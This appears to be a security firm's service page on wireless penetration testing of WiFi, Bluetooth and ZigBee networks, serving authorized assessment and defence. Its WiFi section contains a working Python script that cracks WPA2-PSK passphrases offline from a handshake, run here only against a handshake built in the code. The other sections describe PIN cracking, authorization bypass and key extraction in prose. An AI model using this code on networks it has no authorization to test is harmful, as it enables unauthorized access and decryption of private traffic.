Wireless Networks

Use Our Offense to Inform Your Defense

Wireless network security assessments give an organization a clear understanding of the risks to its information assets from an outsider's perspective: a measure of the exposure that can be probed and attacked by passersby, nearby targeted attackers, or contractors and visitors, since radio signals routinely reach beyond the physical perimeter. Common wireless network environments include WiFi connectivity for guests and internal users, Bluetooth personal area network (PAN) environments, and purpose-built 802.15.4 / ZigBee networks.

Whether a high-level overview or a thorough, in-depth review is desired, DISD works with your staff to produce prioritized findings, recommendations, and remediation or mitigation steps to fit your organization's profile.

DISD performs wireless network security assessments according to well-developed and refined methodologies, in order to provide thorough, accurate, and reproducible results. WiFi security testing typically begins with identification of accessible 802.11 networks, confirmation of target SSIDs, and identification of any rogue access points. Consultants determine each target network's BSSID, band, channel (frequency), encryption, and authentication settings. For pre-shared key (WPA/WPA2-Personal) networks, DISD captures encrypted traffic and client authentication exchanges (the four-way handshake), which allow passphrase candidates to be verified offline without further contact with the network; customized wordlists and automated software on high-power GPU clusters are then used to attempt key recovery efficiently. When successful, consultants decrypt the captured traffic, join the wireless network, and test the segregation controls between it and the internal network.

Activities involved in a WiFi network penetration test include, but are not limited to:

  • Site survey for 802.11a/b/g/n wireless networks
  • Identification of network transmission characteristics
  • Identification of network encryption and authentication mechanisms
  • Traffic capture and decryption
  • Encryption key discovery
  • Customized wordlist generation
  • Pre-shared key guessing attacks
  • Rogue AP detection
  • Fake AP attacks against clients
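The reason handshake capture enables an offline pre-shared key guessing attack is that message 2 of the WPA/WPA2 four-way handshake carries a MIC keyed by the Key Confirmation Key, which is derived deterministically from the passphrase, the SSID, both MAC addresses and both nonces. The following example is added here to illustrate that step and is not DISD's tooling or code from this page; the handshake (SSID, MACs, nonces, passphrase and the EAPOL-Key frame) is constructed inline rather than taken from a real capture, and the small wordlist generator is only a stand-in for the customized wordlist generation listed above.

```python
"""
Offline WPA2-PSK passphrase verification against a (constructed) four-way handshake.
Each candidate passphrase is checked by recomputing the MIC on message 2 and
comparing it with the captured one; no traffic is sent to the network.
"""
import hashlib
import hmac

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81 bytes before the MIC field
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """The first 128 bits of the PTK form the Key Confirmation Key that authenticates EAPOL-Key frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, frame: bytes, key_descriptor_version: int) -> bytes:
    """Recompute the MIC over the EAPOL-Key frame with its MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    if key_descriptor_version == 1:      # WPA / TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if key_descriptor_version == 2:      # WPA2 / CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version")


def check_passphrase(candidate: str, hs: dict) -> bool:
    """True if the candidate reproduces the MIC carried in handshake message 2."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = derive_kck(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    keyver = int.from_bytes(hs["msg2"][5:7], "big") & 0x7    # low 3 bits of Key Information
    captured_mic = hs["msg2"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, hs["msg2"], keyver), captured_mic)


def crack_psk(wordlist, hs: dict):
    """Return the first candidate that verifies, or None. WPA passphrases are 8..63 characters."""
    for cand in wordlist:
        if 8 <= len(cand) <= 63 and check_passphrase(cand, hs):
            return cand
    return None


def targeted_wordlist(seeds, years=("2023", "2024"), suffixes=("", "!", "123")):
    """Stand-in for customized wordlist generation: seed words x optional year x suffix."""
    return [f"{s}{y}{suf}" for s in seeds for y in ("",) + tuple(years) for suf in suffixes]


def build_eapol_key_frame(key_info: int, nonce: bytes, key_data: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Serialize an EAPOL-Key (RSN descriptor) frame with the given fields."""
    body = (
        b"\x02"                                  # descriptor type: RSN
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")                # key length for CCMP
        + (1).to_bytes(8, "big")                 # replay counter
        + nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, key RSC, key ID
        + mic
        + len(key_data).to_bytes(2, "big") + key_data
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type 3 (Key)


def constructed_capture(true_passphrase: str = "Summer2024!") -> dict:
    """Constructed handshake parameters and message 2 (not real traffic); the passphrase is an assumption."""
    hs = {
        "ssid": "CorpGuest",
        "ap_mac": bytes.fromhex("001122334455"),
        "sta_mac": bytes.fromhex("66778899aabb"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
    }
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # RSN IE: CCMP / PSK
    key_info = 0x010A     # MIC bit set, pairwise key, key descriptor version 2
    unsigned = build_eapol_key_frame(key_info, hs["snonce"], rsn_ie)
    kck = derive_kck(pmk_from_passphrase(true_passphrase, hs["ssid"]),
                     hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    mic = eapol_mic(kck, unsigned, 2)
    hs["msg2"] = unsigned[:MIC_OFFSET] + mic + unsigned[MIC_OFFSET + MIC_LEN:]
    return hs


if __name__ == "__main__":
    capture = constructed_capture()
    print("recovered PSK:", crack_psk(targeted_wordlist(["password", "corpguest", "Summer"]), capture))
```

Each candidate costs one 4096-iteration PBKDF2 run, which is why the guessing work is moved onto GPU clusters and why wordlist quality matters more than raw speed. The check applies to WPA/WPA2-Personal only: WPA3-Personal (SAE) does not expose a passphrase-derived MIC in its handshake, so a captured SAE exchange cannot be attacked with a plain offline dictionary run like this one.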


Bluetooth security tests begin with spectrum analysis to passively detect traffic indicative of Bluetooth transmissions. Active discovery techniques locate devices in "discoverable mode" and enumerate their addresses, names, and services. For "non-discoverable" devices, passive sniffing combined with brute-force techniques reveals device addresses. With knowledge of the device address, consultants connect to target devices to further enumerate details such as device class, features, Bluetooth specification version, and protocol stacks implemented. Enumeration also reveals security protections such as encryption, authentication, and authorization requirements. Where legacy (pre-Secure Simple Pairing) PIN-based pairing is in use, the pairing traffic is captured and subjected to offline brute-force attacks to identify the PIN and the corresponding link key. This key is then used to connect to the target device (bypassing address-based authorization checks if necessary) and, potentially, to decrypt captured traffic. Susceptibility to denial-of-service and service degradation attacks can be measured, and input validation and fuzzing activities can be undertaken to test protocol and application robustness and fault tolerance. Depending on the target device profile, unauthorized access may be leveraged, for example, to inject or record audio to and from a headset (HSP), to download sensitive files (OPP/OBEX, FTP), or for other relevant actions.

Activities involved in a Bluetooth security assessment include, but are not limited to:

  • Site survey for FHSS Bluetooth transmissions, devices, and piconets
  • Identification of target device addresses, names, and services
  • Connections to target devices to enumerate additional information, including device class
  • Identification of security protections and requirements
  • Identification of network transmission characteristics
  • Unauthenticated access attempts
  • Authentication traffic capture and offline PIN cracking attempts
  • Online PIN guessing attacks
  • Authorization bypass attempts
  • Authenticated access service use and abuse
  • Encryption key discovery and traffic decryption
  • Rogue device detection
  • Fake device attacks against clients
  • (optional) Denial and degradation of service tests
  • Input validation tests
  • Protocol- and application-level fuzzing
  • Audio recording and injection attempts


802.15.4 (including ZigBee-based) security tests begin with active discovery attempts to identify router and coordinator device addresses, PAN IDs, channels, and stack versions. Once an active channel has been identified, passive sniffing additionally locates end devices. Enumeration of the confidentiality and integrity protections in use, and discovery of application-layer profiles, follow. Traffic is captured and analyzed to verify the presence or absence of encryption at each layer. Where keys are provisioned over the air (for example, a network key transported under a default or otherwise known link key), they are recovered from the capture. Attempts are made to replay captured traffic into the network. Given physical access to a ZigBee device, consultants attempt to extract and analyze its memory, searching for stored encryption keys. With knowledge of the encryption key, consultants decrypt captured traffic and modify selected packets for replay attempts. The key is also used to join the network directly in order to interact with and manipulate routers, coordinators, and end devices. Susceptibility to denial-of-service and service degradation attacks can also be measured, and fuzzing activities can be undertaken to test application robustness and fault tolerance.

Activities involved in a ZigBee security assessment include, but are not limited to:

  • Site survey for ZigBee transmissions, devices, and PANs
  • Identification of target device addresses, PAN IDs, stack profiles, and versions
  • (optional) Physical triangulation of target devices, to gain access to hardware
  • Memory extraction and analysis
  • Identification of security protections and requirements
  • Identification of network transmission characteristics
  • Application profiling
  • 'ACL mode' authorization bypass attempts
  • Unauthenticated access attempts
  • Traffic replay attempts
  • Authentication traffic capture and key extraction attempts
  • Encryption key discovery and traffic decryption
  • Fake device attacks against clients
  • (optional) Denial and degradation of service tests
  • Application-level fuzzing

DISD works with our customers to identify the goals of security assessments prior to testing, and is available to assist in remediation efforts upon request.

Contact Us to Learn More, or Receive A Quote.